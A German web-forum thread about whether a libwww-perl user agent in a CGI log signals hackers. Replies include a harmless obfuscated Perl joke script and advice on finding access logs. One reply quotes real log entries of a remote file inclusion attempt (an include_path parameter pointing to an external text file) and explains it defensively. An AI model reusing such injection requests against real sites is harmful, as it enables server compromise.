Ina: libwww-perl/5.805 = Hacker ?

Hallo

Habe in meinen Logfiles Besucherstatistik folgedes gefunden:

Da hat mein cgi einen Besucher  mit
$ENV{'HTTP_USER_AGENT'}= libwww-perl/5.805 erkannt.

Ich habe mal gehört dass es Hacker sein können , die auf dem gesamten server zugreifen?

MFG

Ina

  1. Da hat mein cgi einen Besucher  mit
    $ENV{'HTTP_USER_AGENT'}= libwww-perl/5.805 erkannt.

    Dabei handelt es sich um das libwww-Package, das zur Programmiersprache Perl gehört.

    Ich habe mal gehört dass es Hacker sein können , die auf dem gesamten server zugreifen?

    @P=split//,".URRUU\c8R";@d=split//,"\nrekcah xinU / lreP rehtona tsuJ";sub p{  
    @p{"r$p","u$p"}=(P,P);pipe"r$p","u$p";++$p;($q*=2)+=$f=!fork;map{$P=$P[$f^ord  
    ($p{$_})&6];$p{$_}=/ ^$P/ix?$P:close$_}keys%p}p;p;p;p;p;map{$p{$_}=~/^[P.]/&&  
    close$_}%p;wait until$?;map{/^r/&&<$_>}%p;$_=$d[$q];sleep rand(2)if/\S/;print
    

    Siechfred

    --
    Hinter den Kulissen passiert viel mehr, als man denkt, aber meistens nicht das, was man denkt.
    1. Hallo Siechfred

      Vielen dank für Deine Antwort, abe ich habe nichts verstanden.

      Sind dass nun kacker oder nicht?

      mfg

      Ina

      1. Hallo Siechfred

        Korektur hatte mich verschrieben:

        Vielen dank für Deine Antwort, aber ich habe nichts verstanden.

        Sind dass nun Hacker oder nicht?

        mfg

        Ina

        1. Vielen dank für Deine Antwort, aber ich habe nichts verstanden.

          Ist das auch wirklich kein Aprilscherz?

          Sind dass nun Hacker oder nicht?

          Nein, ganz bestimmt nicht :) Da hat einfach nur ein Perl-Programmierer vergessen, den UserAgent anzupassen oder ein Witzbold hat seinem Browser diesen UserAgent verpasst.

          Siechfred

          --
          Hinter den Kulissen passiert viel mehr, als man denkt, aber meistens nicht das, was man denkt.
    2. Hallo Siechfred!

      @P=split//,".URRUU\c8R";@d=split//,"\nrekcah xinU / lreP rehtona tsuJ";sub p{

      @p{"r$p","u$p"}=(P,P);pipe"r$p","u$p";++$p;($q*=2)+=$f=!fork;map{$P=$P[$f^ord
      ($p{$})&6];$p{$}=/ ^$P/ix?$P:close$}keys%p}p;p;p;p;p;map{$p{$}=~/[1]/&&
      close$}%p;wait until$?;map{/^r/&&<$>}%p;$_=$d[$q];sleep rand(2)if/\S/;print

        
      Wenn ich diesen Code ausführe, erhalte ich: 01.04.2008? ;) Auf der Konsole wird jedenfalls aborted...  
        
        
        
      Viele Grüße aus Frankfurt/Main,  
      Patrick
      
      -- 
      ![](http://www.atomic-eggs.com/fuernA.jpg)  
        
      \_ - jenseits vom delirium - \_  
        
      [[link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash](http://www.atomic-eggs.com/)]  
      Nichts ist unmöglich? [Doch!](http://www.atomic-eggs.com/cwi/cwi_4.shtml)  
      Heute schon ge[gök](http://goek.atomic-eggs.com/goek_goek.html)t?
      

      1. P. ↩︎

      1. gudn tach!

        @P=split//,".URRUU\c8R";@d=split//,"\nrekcah xinU / lreP rehtona tsuJ";sub p{

        @p{"r$p","u$p"}=(P,P);pipe"r$p","u$p";++$p;($q*=2)+=$f=!fork;map{$P=$P[$f^ord
        ($p{$})&6];$p{$}=/ ^$P/ix?$P:close$}keys%p}p;p;p;p;p;map{$p{$}=~/[1]/&&
        close$}%p;wait until$?;map{/^r/&&<$>}%p;$_=$d[$q];sleep rand(2)if/\S/;print

        
        >   
        > Wenn ich diesen Code ausführe, erhalte ich: 01.04.2008? ;) Auf der Konsole wird jedenfalls aborted...  
          
        hab's nicht ausprobiert, aber es sieht stark nach japh aus.  
          
        prost  
        seth
        

        1. P. ↩︎

        1. Hallo seth_not@home!

          Ich hab's (denke ich) korrekt enteinzeiler-isiert:

          @P=split//,".URRUU\c8R";  
          @d=split//,"\nrekcah xinU / lreP rehtona tsuJ";  
          sub p{  
            @p{"r$p","u$p"}=(P,P);  
            pipe"r$p","u$p";  
            ++$p;  
            ($q*=2)+=$f=!fork;  
            map{$P=$P[$f^ord ($p{$_})&6]; $p{$_}=/ ^$P/ix?$P:close$_}keys%p  
          }  
          p;  
          p;  
          p;  
          p;  
          p;  
          map{$p{$_}=~/^[P.]/&&close$_}%p;  
          wait until$?;  
          map{/^r/&&<$_>}%p;  
          $_=$d[$q];  
          sleep rand(2)if/\S/;  
          print
          

          und erhalte kein 01.04.2008 :(

          prost

          Gök!

          Viele Grüße aus Frankfurt/Main,
          Patrick

          --

          _ - jenseits vom delirium - _
          [link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
          Nichts ist unmöglich? Doch!
          Heute schon gegökt?
          1. gudn tach!

            ich hab's jetzt doch mal ausprobiert. und unter linux mit perl 5.8.8 funzt der kram im cli einwandfrei. mein aufruf war einfach:
              perl -e '...'

            wobei die drei punkte die konkatenierten genannten zeilen symbolisieren sollen. hab keine ahnung, warum's bei dir nicht funzte. musst eigentlich bloss auf die einfachen anfuehrungszeichen achten (bei doppelten muesste der code abgeaendert werden).

            goek!

            1. Hallo seth_not@home!

              perl -e '...'
              musst eigentlich bloss auf die einfachen anfuehrungszeichen achten (bei doppelten muesste der code abgeaendert werden).

              Ja, bei Windows müssen nach perl -e ja doppelte Anführungszeichen stehen, aber auch nach Abändern der anderen in einfachen erhalte ich nichts...

              Viele Grüße aus Frankfurt/Main,
              Patrick

              --

              _ - jenseits vom delirium - _
              [link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
              Nichts ist unmöglich? Doch!
              Heute schon gegökt?
            2. Regök!

              ich hab's jetzt doch mal ausprobiert. und unter linux mit perl 5.8.8 funzt der kram im cli einwandfrei. mein aufruf war einfach:
                perl -e '...'

              mit PuTTy auf dem Server (Perl 5.8.8) eingeloggt und dann funzt's(TM) - schöner Code... ;)

              Auf Windows und 5.8.7 (bei escaped Anführungszeichen) dagegen nicht (auch nicht 5.10.0 auf Vista)...

              Viele Grüße aus Frankfurt/Main,
              Patrick

              --

              _ - jenseits vom delirium - _
              [link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
              Nichts ist unmöglich? Doch!
              Heute schon gegökt?
  2. hi Ina,

    Habe in meinen Logfiles Besucherstatistik folgedes gefunden:
    Da hat mein cgi einen Besucher  mit
    $ENV{'HTTP_USER_AGENT'}= libwww-perl/5.805 erkannt.
    Ich habe mal gehört dass es Hacker sein können , die auf dem gesamten server zugreifen?

    Wie lautet deine Domain?

    Grüße aus H im R an Ina,
    Primus Enginus

  3. Hallo Ina!

    Habe in meinen Logfiles Besucherstatistik folgedes gefunden:
    Da hat mein cgi einen Besucher  mit
    $ENV{'HTTP_USER_AGENT'}= libwww-perl/5.805 erkannt.

    Falls es sich um solche Zeilen handelt:

    85.14.216.89 - libwww-perl/5.76
    Besuchte Domain Uhrzeit Methode Angeforderte Datei Status Referer
    www.atomic-eggs.com 04:35:19 GET /cwi//auction/includes/messages.inc.php?include_path=http://www.manzoteam.it/millesimo/foto_week/36.txt???? 404 -
    www.atomic-eggs.com 04:35:19 GET //auction/includes/messages.inc.php?include_path=http://www.manzoteam.it/millesimo/foto_week/36.txt???? 404 -

    hast Du es mit Script-Kiddies zu tun, die versuchen, die Datei (hier »36.txt«) über das eine oder andere unsichere PHP-Skript auf deinen Server einzuschleusen, um sie später sicher aufzurufen. Ist das PHP-Skript nicht da, haben die eh keine Chance, und erhalten einen 404.

    Viele Grüße aus Frankfurt/Main,
    Patrick

    --

    _ - jenseits vom delirium - _
    [link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
    Nichts ist unmöglich? Doch!
    Heute schon gegökt?
    1. Hallo Patrick

      Also mein cgi hat den User im code $ENV{'HTTP_USER_AGENT'} als
      libwww-perl/5.805 idedifiziert. Deine erwhnten Zeichen, standen nicht im
      $ENV{'HTTP_USER_AGENT'}.

      dort steht normalerweise:

      Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30

      Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

      und so was.

      Vielen Dank

      Ina

      1. Hallo Ina!

        Also mein cgi hat den User im code $ENV{'HTTP_USER_AGENT'} als
        libwww-perl/5.805 idedifiziert. Deine erwhnten Zeichen, standen nicht im
        $ENV{'HTTP_USER_AGENT'}.

        Du solltest auch in der Access-Log nachschauen, was der Besucher mit libwww als User Agent bei Dir gewollt hat! Dann findest Du eventuell solche Requests wie die beiden, die ich eben gepostet habe.

        dort steht normalerweise:
        Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30
        Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

        Oder »Bundestrojaner 1.3«, oder »Husseldiguggel« oder »Poisson d'avril 1.5«... ;)

        Viele Grüße aus Frankfurt/Main,
        Patrick

        --

        _ - jenseits vom delirium - _
        [link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
        Nichts ist unmöglich? Doch!
        Heute schon gegökt?
        1. Hallo Patrick

          Also, ich weis dass der User auf einen Link zugegriffen hat.
          Dieser Link verweist auf einen Ordner.

          In diesem Ordner liegt eine .htaccess Datei
          mit dem Inhalt:             DirectoryIndex index.shtml

          Die index.html

          leitet weiter zu:
          <!--#include virtual="http://meinen-domain.de/cgi-bin/cgi.cgi?art=irgendwas&title=irgendwas" -->

          Wo finde ich die Access-Log?

          mfg

          Ina

          1. leitet weiter zu:
            <!--#include virtual="http://meinen-domain.de/cgi-bin/cgi.cgi?art=irgendwas&title=irgendwas" -->

            ein include ist keine weiterleitung

            1. Hallo suit,

              Vielen Dank, also ein Aufruf

              mfg Ina

          2. Hallo Ina!

            <!--#include virtual="http://meinen-domain.de/cgi-bin/cgi.cgi?art=irgendwas&title=irgendwas" -->

            Was ist/macht »cgi.cgi« für ein Skript? Hoffentlich ein sicheres (http://forum.de.selfhtml.org/archiv/2008/1/t164874/#m1074977)!

            Wo finde ich die Access-Log?

            Bei vielen Providern ist sie in einem Verzeichnis /logs, es kann aber auch sein, dass sie sonstwo versteckt ist, und - wie bei all inkl - Dir erst am nächsten Tag als .gz-Datei zur Verfügung steht. Frag einfach den Provider, jeder kocht da sein eigenes Süppchen...!

            PS: nutze für Beispiele, oder wenn Du die eigene Domain nicht nennen willst: example.org/.com :

            <!--#include virtual="http://example.org/cgi-bin/cgi.cgi?art=irgendwas&title=irgendwas" -->

            Viele Grüße aus Frankfurt/Main,
            Patrick

            --

            _ - jenseits vom delirium - _
            [link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
            Nichts ist unmöglich? Doch!
            Heute schon gegökt?